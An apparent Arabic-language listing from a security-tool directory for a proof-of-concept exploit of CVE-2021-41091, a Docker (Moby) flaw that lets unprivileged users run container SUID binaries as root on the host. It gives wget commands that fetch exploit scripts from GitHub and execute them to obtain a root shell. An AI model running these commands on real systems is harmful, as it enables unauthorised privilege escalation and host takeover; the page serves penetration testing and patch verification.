Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-41091 — إثبات مفهوم (Proof-of-concept) لاستغلال CVE-2021-41091: اجتياز الدليل (directory traversal) في Moby (محرك Docker) الذي يسمح للمستخدمين غير المميزين بتشغيل الملفات الثنائية التي تم تعيين SUID من الحاوية على المضيف. يتضمن نصوصًا برمجية (PoC scripts) لأوبونتو 20.04. | Kitploit
أدوات/GitHubGitHub/jrbh4ck/cve-2021-41091
تصعيد الامتيازاتأمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالهروب من الحاوية
GitHubjrbh4ck/cve-2021-41091

CVE-2021-41091

إثبات مفهوم (Proof-of-concept) لاستغلال CVE-2021-41091: اجتياز الدليل (directory traversal) في Moby (محرك Docker) الذي يسمح للمستخدمين غير المميزين بتشغيل الملفات الثنائية التي تم تعيين SUID من الحاوية على المضيف. يتضمن نصوصًا برمجية (PoC scripts) لأوبونتو 20.04.

عرض المستودع
6منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-41091

خطأ في Moby (Docker Engine) يسمح للمستخدمين غير المصرح لهم بعبور الدلائل وتنفيذ البرامج مباشرة من الحاوية على الجهاز المضيف؛ إذا كان هناك برنامج suid في الحاوية، يمكن للمستخدم تشغيله كـ suid على الجهاز المضيف.

PoC

في محطة الحاوية، نقوم بتنزيل الملف docker.sh، ثم نقوم بتشغيله كمستخدم root:

root@kitploit:~
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh

الآن على الجهاز الرئيسي، نقوم بتنزيل الملف principal.sh وتشغيله:

root@kitploit:~
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh

نقوم بتشغيل الأمر الذي سيمنحنا الملف وسنكون قادرين على تشغيل /bin/bash كجذر.

ملاحظات

تم اختبار هذه السكربتات على Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) مع إصدار Moby 20.10.5+dfsg1

استخدام هذا المستودع هو مسؤولية من يستخدمه وليس المؤلف.

تنزيل الأداة